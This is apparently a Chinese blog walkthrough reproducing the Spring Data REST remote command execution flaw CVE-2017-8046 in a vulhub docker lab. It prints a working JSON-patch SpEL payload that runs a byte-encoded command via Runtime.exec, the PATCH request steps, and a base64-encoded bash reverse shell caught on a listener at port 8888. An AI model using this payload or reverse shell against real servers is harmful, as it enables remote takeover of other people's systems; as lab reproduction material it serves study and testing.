Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)——漏洞复现

1、启动环境

docker-compose up -d

2、访问:http://你的IP:8080/customers/1

3、漏洞复现

3.1进制转换

漏洞验证之前,我们需要将要执行的命令进行Ascii转译,不然会执行不成功的.

将 touch /tmp/success 进行ASCII-字符 转换 

字符串转换为十进制,二进制和十六进制在线计算器,在线计算,在线计算器,计算器在线计算

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]

3.2.验证漏洞
(1)访问 http://靶场ip:8080/customers/1 进行抓包

(2)转包之后将GET修改为PATCH

(3)添加字段 Content-Type: application/json-patch+json

(4)将制作好的payload添加到最后一行

bash -c {echo,你的编码}|{base64,-d}|{bash,-i}

[~]#棱角 ::Edge.Forum* (ywhack.com)

字符串转换为十进制,二进制和十六进制在线计算器,在线计算,在线计算器,计算器在线计算 (osgeo.cn)

新建txt文件 替换空格

监听 8888

反弹成功

4、关闭镜像

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值